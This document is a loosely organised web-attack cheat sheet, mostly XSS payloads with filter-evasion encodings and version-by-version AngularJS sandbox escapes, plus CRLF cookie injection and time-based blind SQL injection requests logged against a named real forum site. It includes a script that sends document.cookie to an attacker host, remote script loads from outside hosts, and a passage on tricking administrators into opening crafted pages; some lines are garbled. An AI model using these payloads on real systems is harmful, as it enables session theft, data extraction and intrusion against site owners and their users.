>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
<script>prompt(1)</script>
<script>confirm(1)</script>
'"--></style></scRipt><scRipt>alert('XSSPOS ED')</scRipt>
/><script>window.alert('XSS Vulnerable');</script>
<script>window.alert('XSS Vulnerable');</script>
#<script>alert(document.domain)</script> dom
<script>alert(document.URL)</script>
<iframe src="http://www.cnn.com"></iframe>
<script>alert(1)</script>
JSON attributes
"--></style></script><script>alert("XSS")</script>
-------
Filter XSS
/?#&;:="%<>@[\\]^`{|}
'';!--"<XSS>=&{()}
Filtered:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
2%69%70%74%3e
<ScRipt>ALeRt("hi");</sCRipT>
vulnerable"%3B%20alert(%27Mondays%27)%3B%20"
JSON attributes
"};alert(23);a={"a":
html tags
</script><script>alert("XSS")</script>
<body onload=prompt("justqdjing")>
>'>"><svg/onload=alert(document.domain)>
"/><svg onload=prompt(document.domain)>
"></script><svg/onload=alert("XSS")>-- url
https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/
1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E
'|alert('XSS')|'
%27|alert%28%27XSS%27%29|%27
%2527%257Calert%2528%2527XSS%2527%2529%257C%2527
';alert(/xss/)///
';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--
></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//
------
javascript:alert(1);///// -outhn
javascript:alert(1);
javascript:alert(document.domain);
<ScRiPt%20>prompt(document.domain)</ScRiPt> -- naem
http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama
Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1
<SCRIPT>
Document.write('<img
src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');
</SCRIPT>
------
'<script>alert('xss message')</script>
"><script>alert('xss message')</script>
>/"><script>alert('xss message')</script>
"><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>/><':
;<><script></script>/<script>alert('0')</script>
</script><script>prompt("test")</script>
"><script>alert(document.location)</script><"
--------------------------------------------------
<b><h1>Html Injection
<a href="example.com">asdf</a>
-----------------------------------------
3:- "><script>alert(“XSS”);</script>
" onmouseover="alert(1)
6:- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
7:- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
8:- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E
9:- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E
"()%26%251
-------------------
https://www.poodlescan.com/
--------------------
callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//
javascript:alert(document.cookie);//
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
CODE :
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
<script>alert("XSS")</script>
<script>alert("XSS")</script>
<script>alert(%34XSS%34)</script>
<script>alert('XSS')</script>
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_onerror_and_javascript_alert_encode
http://webtechhut.blogspot.in/2014/12/cross-site-scripting-in-two-subdomain.html
<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>
<IMG%20SRC=axc%20onerror=alert(1)>
CRLF
"37d8600defb103276f30e279f5fdcb6d %0D%0ASet-Cookie:%20Attacker=Attacker;
More advanced
XSS, also written CSS (Cross-Site Scripting), is the cross-site scripting attack: a malicious attacker inserts
malicious HTML code into a Web page. When users browse the page, the HTML code embedded in it is executed,
which achieves the attacker's particular purpose. In every case the underlying flaw is that attacker-supplied
markup is written into the page without output encoding for the context it lands in.
One kind attacks from the inside: it mainly uses the program's own vulnerabilities to construct cross-site
statements, for example the cross-site vulnerability that exists in showerror.asp of dvbbs.
The other kind attacks from the outside: it mainly refers to constructing one's own XSS cross-site pages, or
finding a page with a cross-site vulnerability other than the target's.
For example, when we want to infiltrate a site, we construct a page with a cross-site vulnerability, then
construct the cross-site statement, and combine it with other techniques, such as social engineering, to
deceive the administrator of the target server into opening it.
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=jav..??..S')>
<IMG SRC=jav..??..S')>
( 13 ) embedded newline
');">
<IMG SRC="javascript:alert('XSS')">
( 17 ) null character
( 18 ) 2 null characters. Domestically, null characters have had basically no effect, because there is no
place to use them.
perl-e 'print "<SCRIPT> alert (" XSS ") </ SCRIPT>";'> out
<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
<SCRIPT SRC=//3w.org/XSS/xss.js>
<iframe src=http://3w.org/XSS.html>
<SCRIPT> A = / XSS /
Code:
<INPUT SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
( 38 ) remote stylesheet
<STYLE> Li {list-style-image: url ("javascript: alert ('XSS')");} </ STYLE> <UL> <LI> XSS
SQL
'%2 and if(substring(user(),1,1)='c',SLEEP(3),1)+' - true (sleeps 3 sec)
----------
---------------------------------------
Referer: https://parapa.mail.ru/forums/showthread.php?t=106825&page=74&p=3522012
parapa_sid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(2000
0000),1)))a)--%20 - true (sleeps 5 sec)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),2,1)='a',sleep(5),1))
)a)--%20 - true (sleeps 5 sec)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),3,1)='x',sleep(5),1))
)a)--%20 - false (quick response)
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),4,1)='z',sleep(5),1))
)a)--%20 - false (quick response)
------------------------------------------
Blind test
<div ng-app>
{{
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
}}
</div>
<div ng-app>
{{
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)')+''
}}
</div>
<script>
onload=function(){
document.write(String.fromCharCode(97));
</script>
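AngularJS expression sandbox escapes, listed by affected version. The expression sandbox was never a security boundary and was removed in AngularJS 1.6; the fix on every version is to keep user input out of templates and expressions rather than to rely on the sandbox.
1.0.1 - 1.1.5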
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,
0,'alert(1)')()}}
1.2.2 - 1.2.5
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert
(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23
Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toStrin
g.constructor);}}
1.2.24 - 1.2.29
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002e
x=1)')+eval(y)+\"'");}}
1.3.0
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2
Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
Time payload
%22%20onmouseover%3dalert%281%29%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bhe
ight%3a100%25%3btop%3a0%3bleft%3a0%3b%20d7451
<script>alert(“Xss-By-Muhaddi”)</script>
“><script>alert(“Xss-By-Muhaddi”)</script>
“><script>alert(/Xss-By-Muhaddi/)</script>
</script><script>alert(“Xss-By-Muhaddi”)</script>
“);alert(“Xss-By-Muhaddi”);//
“><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>
“><ScRiPt>alert(“Xss-By-Muhaddi”)</sCrIpT>
“><detials ontoggle=confirm(0)>
“><svg/onload=prompt(“Xss-By-Muhaddi”)>
“><body/onload=alert(“Xss-By-Muhaddi”)>
Style Context:
body{xss:expression(alert(“Xss-By-Muhaddi”))}
xss:expression(alert(/Xss-By-Muhaddi/)
<<SCRIPT>alert(“Xss-By-Muhaddi”);//<</SCRIPT>
%253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e
“><s”%2b”cript>alert(/Xss-By-Muhaddi/)</script>
foo<script>alert(/Xss-By-Muhaddi/)</script>
<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>
Advanced payloads:
Hex Encoding
“><IMG SRC=x
onerror=javascript:ale&#x
72t('XSS')>
“><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>
<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe
Alert = a\u006cer\u0074
Prompt = p\u0072om\u0070\u0074
Confirm = co\u006efir\u006d
Javascript = jAvascript
: = :
( = (
) = )